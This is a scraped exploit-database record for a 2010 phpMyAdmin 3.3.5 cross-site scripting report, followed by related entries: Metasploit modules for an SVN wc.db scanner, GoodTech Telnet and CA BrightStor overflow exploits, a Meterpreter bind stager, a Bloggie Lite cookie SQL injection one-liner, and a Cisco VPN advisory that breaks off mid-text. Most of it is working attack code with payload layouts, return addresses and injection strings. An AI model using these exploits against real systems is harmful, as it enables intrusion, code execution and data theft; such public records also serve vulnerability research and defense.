ID 1337DAY-ID-13663 Type zdt Reporter Sid3^effects Modified 2010-08-11T00:00:00
Description
Exploit for php platform in category web applications
==================================
phpMyAdmin 3.3.5 XSS Vulnerability
==================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################## 1
0 I'm Sid3^effects member from Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Name : phpMyAdmin 3.3.5 XSS Vulnerability
Date : August, 11 2010
Affected Versions: its older versions too :P
Vendor Url : http://www.phpmyadmin.net/
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_,Sn!pEr.S!Te,n4pst3rr
greetz to :www.topsecure.net ,trent Dillman,All ICW members and my friends :) luv y0 guyz
#######################################################################################################
Description :
phpMyAdmin is a free software tool written in PHP intended to handle the administration of MySQL over the World Wide Web.
phpMyAdmin supports a wide range of operations with MySQL. The most frequently used operations are supported by the user
interface (managing databases, tables, fields, relations, indexes, users, permissions, etc), while you still have the ability
to directly execute any SQL statement.
###############################################################################################################
Xploit: XSS Vulnerability
The xss script gets executed by inserting the script in the "Field" section.
Step 1 : Login to your phpmyadmin :)
Step 2 : Create new database ... For example w00t
Step 3 : Now create Table
For example
CREATE TABLE `r0ot` (
`id` int(8) NOT NULL auto_increment,
`><script>alert(/inj3ct0r/)</script>` text NOT NULL,
PRIMARY KEY (`id`)
)
Step 4 : NOw execute your table :)
you can check here for the latest version :)
DEMO URL: http://demo.phpmyadmin.net/STABLE/
Screenshots : http://img208.imageshack.us/img208/4006/phpmyadmin.png
###############################################################################################################
# 0day no more
# Sid3^effects
# 0day.today [2018-03-05] #
{"published": "2010-08-11T00:00:00", "id": "1337DAY-ID-13663", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-19T23:28:46", "bulletin": {"published": "2010-08-11T00:00:00", "id": "1337DAY-ID-13663", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 6.0, "modified": "2016-04-19T23:28:46"}}, "hash": "4fe1ec86d86572d8743d7263082b0bf77ef7690d2023dad51d234494e3f3b4e4", "description": "Exploit for php platform in category web applications", "type": "zdt", "lastseen": "2016-04-19T23:28:46", "edition": 1, "title": "phpMyAdmin 3.3.5 XSS Vulnerability", "href": "http://0day.today/exploit/description/13663", "modified": "2010-08-11T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/13663", "references": [], "reporter": "Sid3^effects", "sourceData": "==================================\r\nphpMyAdmin 3.3.5 XSS Vulnerability\r\n==================================\r\n\r\n\r\n1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n0 _ __ __ __ 1\r\n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n1 \\ \\____/ >> Exploit database separated by exploit 0\r\n0 \\/___/ type (local, remote, DoS, etc.) 1\r\n1 1\r\n0 [+] Site : Inj3ct0r.com 0\r\n1 [+] Support e-mail : submit[at]inj3ct0r.com 1\r\n0 0\r\n1 ########################################## 1\r\n0 I'm Sid3^effects member from Inj3ct0r Team 1\r\n1 ########################################## 0\r\n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\r\n\r\nName : phpMyAdmin 3.3.5 XSS Vulnerability\r\nDate : August, 11 2010\r\nAffected Versions: its older versions too :P\r\nVendor Url : http://www.phpmyadmin.net/\r\nAuthor : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>\r\nspecial thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_,Sn!pEr.S!Te,n4pst3rr\r\ngreetz to :www.topsecure.net ,trent Dillman,All ICW members and my friends :) luv y0 guyz\r\n#######################################################################################################\r\nDescription :\r\nphpMyAdmin is a free software tool written in PHP intended to handle the administration of MySQL over the World Wide Web.\r\n\r\nphpMyAdmin supports a wide range of operations with MySQL. The most frequently used operations are supported by the user\r\n\r\ninterface (managing databases, tables, fields, relations, indexes, users, permissions, etc), while you still have the ability\r\n\r\nto directly execute any SQL statement.\r\n###############################################################################################################\r\nXploit: XSS Vulnerability \r\n \r\nThe xss script gets executed by inserting the script in the \"Field\" section. \r\n\r\nStep 1 : Login to your phpmyadmin :)\r\n\r\nStep 2 : Create new database ... For example w00t\r\n\r\nStep 3 : Now create Table\r\n\r\nFor example\r\nCREATE TABLE `r0ot` (\r\n`id` int(8) NOT NULL auto_increment,\r\n`><script>alert(/inj3ct0r/)</script>` text NOT NULL,\r\nPRIMARY KEY (`id`)\r\n)\r\n\r\nStep 4 : NOw execute your table :)\r\n\r\nyou can check here for the latest version :)\r\nDEMO URL: http://demo.phpmyadmin.net/STABLE/\r\n\r\nScreenshots : http://img208.imageshack.us/img208/4006/phpmyadmin.png\r\n###############################################################################################################\r\n# 0day no more\r\n# Sid3^effects \r\n\r\n\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "9584fc695f8bd27c77560a60d2e57f42", "key": "modified"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "da1c4fb53d50d9c42d032ae62780dcab", "key": "reporter"}, {"hash": "7b7200d0272b002f7438b6e54956ef9a", "key": "sourceData"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d713a6e4624bd0fc5f721866689afdce", "key": "href"}, {"hash": "9584fc695f8bd27c77560a60d2e57f42", "key": "published"}, {"hash": "4f543288f6f8265ac53f09a3438325fc", "key": "sourceHref"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "40e0ac586be439b67d65a41d8582719b", "key": "title"}], "objectVersion": "1.0"}}], "description": "Exploit for php platform in category web applications", "hash": "8e0769e3a873f621c94f021f8c075b13876139d4dc6b3fb36ca38a92ca96814b", "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2018-03-06T01:36:54"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-4006"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:13663", "SECURITYVULNS:VULN:6183"]}], "modified": "2018-03-06T01:36:54"}, "vulnersScore": 0.0}, "type": "zdt", "lastseen": "2018-03-06T01:36:54", "edition": 2, "title": "phpMyAdmin 3.3.5 XSS Vulnerability", "href": "https://0day.today/exploit/description/13663", "modified": "2010-08-11T00:00:00", "bulletinFamily": "exploit", "viewCount": 3, "cvelist": [], "sourceHref": "https://0day.today/exploit/13663", "references": [], "reporter": "Sid3^effects", "sourceData": "==================================\r\nphpMyAdmin 3.3.5 XSS Vulnerability\r\n==================================\r\n\r\n\r\n1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n0 _ __ __ __ 1\r\n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n1 \\ \\____/ >> Exploit database separated by exploit 0\r\n0 \\/___/ type (local, remote, DoS, etc.) 1\r\n1 1\r\n0 [+] Site : Inj3ct0r.com 0\r\n1 [+] Support e-mail : submit[at]inj3ct0r.com 1\r\n0 0\r\n1 ########################################## 1\r\n0 I'm Sid3^effects member from Inj3ct0r Team 1\r\n1 ########################################## 0\r\n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\r\n\r\nName : phpMyAdmin 3.3.5 XSS Vulnerability\r\nDate : August, 11 2010\r\nAffected Versions: its older versions too :P\r\nVendor Url : http://www.phpmyadmin.net/\r\nAuthor : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>\r\nspecial thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_,Sn!pEr.S!Te,n4pst3rr\r\ngreetz to :www.topsecure.net ,trent Dillman,All ICW members and my friends :) luv y0 guyz\r\n#######################################################################################################\r\nDescription :\r\nphpMyAdmin is a free software tool written in PHP intended to handle the administration of MySQL over the World Wide Web.\r\n\r\nphpMyAdmin supports a wide range of operations with MySQL. The most frequently used operations are supported by the user\r\n\r\ninterface (managing databases, tables, fields, relations, indexes, users, permissions, etc), while you still have the ability\r\n\r\nto directly execute any SQL statement.\r\n###############################################################################################################\r\nXploit: XSS Vulnerability \r\n \r\nThe xss script gets executed by inserting the script in the \"Field\" section. \r\n\r\nStep 1 : Login to your phpmyadmin :)\r\n\r\nStep 2 : Create new database ... For example w00t\r\n\r\nStep 3 : Now create Table\r\n\r\nFor example\r\nCREATE TABLE `r0ot` (\r\n`id` int(8) NOT NULL auto_increment,\r\n`><script>alert(/inj3ct0r/)</script>` text NOT NULL,\r\nPRIMARY KEY (`id`)\r\n)\r\n\r\nStep 4 : NOw execute your table :)\r\n\r\nyou can check here for the latest version :)\r\nDEMO URL: http://demo.phpmyadmin.net/STABLE/\r\n\r\nScreenshots : http://img208.imageshack.us/img208/4006/phpmyadmin.png\r\n###############################################################################################################\r\n# 0day no more\r\n# Sid3^effects \r\n\r\n\n\n# 0day.today [2018-03-05] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "a603be8a5638fd5b11cc1ea3299676e4", "key": "href"}, {"hash": "9584fc695f8bd27c77560a60d2e57f42", "key": "modified"}, {"hash": "9584fc695f8bd27c77560a60d2e57f42", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "da1c4fb53d50d9c42d032ae62780dcab", "key": "reporter"}, {"hash": "023c106fe0b934f4e9efccd6ceea92d9", "key": "sourceData"}, {"hash": "deb76576290ed25c77d67ba04f480f49", "key": "sourceHref"}, {"hash": "40e0ac586be439b67d65a41d8582719b", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"metasploit": [{"lastseen": "2019-11-29T07:45:08", "bulletinFamily": "exploit", "description": "Scan for servers that allow access to the SVN wc.db file. Based on the work by Tim Meddin.\n", "modified": "2017-07-24T13:26:21", "published": "2012-12-06T21:30:23", "id": "MSF:AUXILIARY/SCANNER/HTTP/SVN_WCDB_SCANNER", "href": "", "type": "metasploit", "title": "SVN wc.db Scanner", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'SVN wc.db Scanner',\n 'Description' => %q{\n Scan for servers that allow access to the SVN wc.db file.\n Based on the work by Tim Meddin.\n },\n 'Author' =>\n [\n 'Stephen Haywood <stephen[at]averagesecurityguy.info>',\n ],\n 'References' =>\n [\n ['URL', 'http://pen-testing.sans.org/blog/pen-testing/2012/12/06/all-your-svn-are-belong-to-us#']\n ],\n 'License' => MSF_LICENSE\n )\n\n register_advanced_options(\n [\n OptString.new('TARGETURI', [false, 'Base path to the .svn directory', '/.svn/'])\n ])\n end\n\n def run_host(ip)\n base_path = target_uri.path\n get_wcdb(normalize_uri(base_path, 'wc.db'))\n end\n\n def get_wcdb(path)\n proto = (ssl ? 'https://' : 'http://')\n vprint_status(\"Trying #{proto}#{vhost}:#{rport}#{path}\")\n begin\n res = send_request_cgi(\n {\n 'method' => 'GET',\n 'uri' => path,\n 'ctype' => 'text/plain'\n }\n )\n\n if res and res.code == 200\n print_good(\"SVN wc.db database found on #{vhost}:#{rport}\")\n\n file = store_loot(\n \"svn.wcdb.database\",\n \"application/octet-stream\",\n vhost,\n res.body,\n \"wc.db\",\n \"SVN wc.db database\"\n )\n\n print_good(\"SVN wc.db database stored in #{file}\")\n\n report_note(\n :host => rhost,\n :port => rport,\n :proto => 'tcp',\n :sname => (ssl ? 'https' : 'http'),\n :type => 'svn_wc_database',\n :data => \"SVN wc.db database is stored in #{file}\"\n )\n else\n vprint_error(\"SVN wc.db database not found on #{vhost}:#{rport}\")\n end\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout\n rescue ::Timeout::Error, ::Errno::EPIPE\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/svn_wcdb_scanner.rb"}, {"lastseen": "2019-11-26T09:58:55", "bulletinFamily": "exploit", "description": "This module exploits a stack buffer overflow in GoodTech Systems Telnet Server versions prior to 5.0.7. By sending an overly long string, an attacker can overwrite the buffer and control program execution.\n", "modified": "2017-07-24T13:26:21", "published": "2008-04-06T10:45:29", "id": "MSF:EXPLOIT/WINDOWS/TELNET/GOODTECH_TELNET", "href": "", "type": "metasploit", "title": "GoodTech Telnet Server Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'GoodTech Telnet Server Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in GoodTech Systems Telnet Server\n versions prior to 5.0.7. By sending an overly long string, an attacker can\n overwrite the buffer and control program execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' => 'MC',\n 'References' =>\n [\n [ 'CVE', '2005-0768' ],\n [ 'OSVDB', '14806'],\n [ 'BID', '12815' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\",\n 'PrependEncoder' => \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\",\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows 2000 Pro English All', { 'Ret' => 0x75022ac4 } ],\n [ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],\n ],\n 'Privileged' => true,\n 'DisclosureDate' => 'Mar 15 2005',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(2380)\n ])\n end\n\n def exploit\n connect\n\n sploit = rand_text_english(10020, payload_badchars)\n seh = generate_seh_payload(target.ret)\n\n sploit[10012, seh.length] = seh\n\n print_status(\"Trying target #{target.name}...\")\n\n sock.put(sploit + \"\\r\\n\\r\\n\")\n\n handler\n disconnect\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/telnet/goodtech_telnet.rb"}, {"lastseen": "2019-11-26T10:23:04", "bulletinFamily": "exploit", "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Listen for a connection (Windows x86)\n", "modified": "2017-07-24T13:26:21", "published": "2007-02-18T00:10:39", "id": "MSF:PAYLOAD/WINDOWS/METERPRETER/BIND_TCP", "href": "", "type": "metasploit", "title": "Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/core/payload/windows/bind_tcp'\n\nmodule MetasploitModule\n\n CachedSize = 285\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::BindTcp\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Bind TCP Stager (Windows x86)',\n 'Description' => 'Listen for a connection (Windows x86)',\n 'Author' => ['hdm', 'skape', 'sf'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::BindTcp,\n 'Convention' => 'sockedi',\n 'Stager' => { 'RequiresMidstager' => false }\n ))\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/bind_tcp.rb"}, {"lastseen": "2019-12-07T16:36:21", "bulletinFamily": "exploit", "description": "This module exploits a convoluted heap overflow in the CA BrightStor Universal Agent service. Triple userland exception results in heap growth and execution of dereferenced function pointer at a specified address.\n", "modified": "2017-07-24T13:26:21", "published": "2005-12-05T04:57:41", "id": "MSF:EXPLOIT/WINDOWS/BRIGHTSTOR/UNIVERSAL_AGENT", "href": "", "type": "metasploit", "title": "CA BrightStor Universal Agent Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'CA BrightStor Universal Agent Overflow',\n 'Description' => %q{\n This module exploits a convoluted heap overflow in the CA\n BrightStor Universal Agent service. Triple userland\n exception results in heap growth and execution of\n dereferenced function pointer at a specified address.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2005-1018'],\n [ 'OSVDB', '15471' ],\n [ 'BID', '13102'],\n [ 'URL', 'http://www.idefense.com/application/poi/display?id=232&type=vulnerabilities'],\n ],\n 'Privileged' => true,\n 'Payload' =>\n {\n # 250 bytes of space (bytes 0xa5 -> 0xa8 = reversed)\n 'Space' => 164,\n 'BadChars' => \"\\x00\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => %w{ win },\n 'Targets' =>\n [\n [\n 'Magic Heap Target #1',\n {\n 'Platform' => 'win',\n 'Ret' => 0x01625c44, # We grow to our own return address\n },\n ],\n ],\n 'DisclosureDate' => 'Apr 11 2005',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(6050)\n ])\n end\n\n def exploit\n\n print_status(\"Trying target #{target.name}...\")\n\n # The server reverses four bytes starting at offset 0xa5 :0\n\n # Create the overflow string\n boom = 'X' * 1024\n\n # Required field to trigger the fault\n boom[248, 2] = [1000].pack('V')\n\n # The shellcode, limited to 250 bytes (no nulls)\n boom[256, payload.encoded.length] = payload.encoded\n\n # This should point to itself\n boom[576, 4] = [target.ret].pack('V')\n\n # This points to the code below\n boom[580, 4] = [target.ret + 8].pack('V')\n\n # We have 95 bytes, use it to hop back to shellcode\n boom[584, 6] = \"\\x68\" + [target.ret - 320].pack('V') + \"\\xc3\"\n\n # Stick the protocol header in front of our request\n req = \"\\x00\\x00\\x00\\x00\\x03\\x20\\xa8\\x02\" + boom\n\n # We keep making new connections and triggering the fault until\n # the heap is grown to encompass our known return address. Once\n # this address has been allocated and filled, each subsequent\n # request will result in our shellcode being executed.\n\n 1.upto(200) {|i|\n connect\n print_status(\"Sending request #{i} of 200...\") if (i % 10) == 0\n sock.put(req)\n disconnect\n\n # Give the process time to recover from each exception\n select(nil,nil,nil,0.1);\n }\n\n handler\n end\nend\n\n\n__END__\n012a0d91 8b8e445c0000 mov ecx,[esi+0x5c44]\n012a0d97 83c404 add esp,0x4\n012a0d9a 85c9 test ecx,ecx\n012a0d9c 7407 jz ntagent+0x20da5 (012a0da5)\n012a0d9e 8b11 mov edx,[ecx] ds:0023:41327441=???????\n012a0da0 6a01 push 0x1\n012a0da2 ff5204 call dword ptr [edx+0x4]\n\nEach request will result in another chunk being allocated, the exception\ncauses these chunks to never be freed. The large chunk size allows us to\npredict the location of our buffer and grow our buffer to where we need it.\n\nIf these addresses do not match up, run this exploit, then attach with WinDbg:\n\n> s 0 Lfffffff 0x44 0x5c 0x61 0x01\n\nFigure out the pattern, replace the return address, restart the service,\nand run it through again. Only tested on WinXP SP1\n\n011b5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n011c5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n011d5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n011e5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n011f5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n01205c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n[ snip ]\n01605c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n01615c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n01625c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n01635c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n01645c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n01655c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n01665c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n01675c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n01685c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n01695c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n016a5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n016b5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n016c5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n016d5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n01725c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n017e5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\\b.L\\b.........\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/brightstor/universal_agent.rb"}], "zdt": [{"lastseen": "2018-03-13T01:17:19", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2008-11-01T00:00:00", "published": "2008-11-01T00:00:00", "id": "1337DAY-ID-4006", "href": "https://0day.today/exploit/description/4006", "type": "zdt", "title": "Bloggie Lite 0.0.2 Beta SQL Injection by Insecure Cookie Handling", "sourceData": "=================================================================\r\nBloggie Lite 0.0.2 Beta SQL Injection by Insecure Cookie Handling\r\n=================================================================\r\n\r\n\r\n# Bloggie Lite 0.0.2 Beta SQl Injection by Insecure Cookie Handling\r\n# url: http://mywebland.com/download.php?id=20\r\n#\r\n# Author: JosS\r\n#\r\n# This was written for educational purpose. Use it at your own risk.\r\n# Author will be not responsible for any damage.\r\n\r\nvuln file: /genscode.php\r\nvuln code:\r\n39: $user_ip = $_SERVER['REMOTE_ADDR'];\r\n define('COMMENT_COOKIE', md5($user_ip));\r\n if(isset($_COOKIE[COMMENT_COOKIE])) {\r\nxx: ...\r\n $comment_cookie = $_COOKIE[COMMENT_COOKIE];\r\n55: $sql = \"SELECT * FROM \".SCODE_TBL.\" WHERE cookie = '\".$comment_cookie.\"'\";\r\n\r\nexploit:\r\njavascript:document.cookie = \"f528764d624db129b32c21fbca0cb8d6=127.0.0.1'+union+all+select+user(),user(),user()/*; path=/\";\r\n\r\nHack0wn :D\r\n\r\n\r\n\n# 0day.today [2018-03-12] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/4006"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:18", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nCisco Security Advisory: \r\nWindows VPN Client Local Privilege Escalation Vulnerability\r\n\r\nDocument ID: 70332\r\n\r\nAdvisory ID: cisco-sa-20060524-vpnclient\r\n\r\nhttp://www.cisco.com/warp/public/707/cisco-sa-20060524-vpnclient.shtml\r\n\r\nRevision 2.0\r\n\r\nLast Updated 2006 July 27 2000 UTC (GMT)\r\n\r\nFor Public Release 2006 May 24 1600 UTC (GMT)\r\n\r\n- -----------------------------------------------------------------------\r\n\r\nContents\r\n========\r\n\r\n Summary\r\n Affected Products\r\n Details\r\n Impact\r\n Software Versions and Fixes\r\n Workarounds\r\n Obtaining Fixed Software\r\n Exploitation and Public Announcements\r\n Status of This Notice: FINAL\r\n Distribution\r\n Revision History\r\n Cisco Security Procedures\r\n\r\n- -----------------------------------------------------------------------\r\n\r\nSummary\r\n=======\r\n\r\nThe Cisco VPN Client for Windows is affected by a local privilege\r\nescalation vulnerability that allows non-privileged users to gain\r\nadministrative privileges.\r\n\r\nA user needs to authenticate and start an interactive Windows session\r\nto be able to exploit this vulnerability.\r\n\r\nCisco has made free software available to address this vulnerability\r\nfor affected customers. There is a workaround available to mitigate the\r\neffects of the vulnerability.\r\n\r\nThis advisory is posted at \r\nhttp://www.cisco.com/warp/public/707/cisco-sa-20060524-vpnclient.shtml.\r\n\r\nAffected Products\r\n=================\r\n\r\nVulnerable Products\r\n+------------------\r\n\r\nThe following versions of the Cisco VPN Client for Windows (excluding\r\nWindows 9x users) are affected:\r\n\r\n * 2.x\r\n * 3.x\r\n * 4.0.x\r\n * 4.6.x\r\n * 4.7.x with the exception of version 4.7.00.0533 (see below in\r\n Products Confirmed Not Vulnerable.)\r\n * 4.8.00.x\r\n\r\nProducts Confirmed Not Vulnerable\r\n+--------------------------------\r\n\r\nAll other versions of Cisco VPN Client that are based on an operating\r\nsystem other than Microsoft Windows are not affected by this\r\nvulnerability. These include:\r\n\r\n * Any version of the Cisco VPN Client for Solaris\r\n * Any version of the Cisco VPN Client for Linux\r\n * Any version of the Cisco VPN Client for Macintosh (MacOS X and\r\n MacOS Classic)\r\n\r\nCisco VPN Client for Windows version 4.8.01.x and later are not\r\naffected by this vulnerability.\r\n\r\nIn addition, due to a regression, version 4.7.00.0533 of the Cisco VPN\r\nClient for Windows is not affected, even though other 4.7.x are\r\naffected. Users running version 4.7.00.0533 of 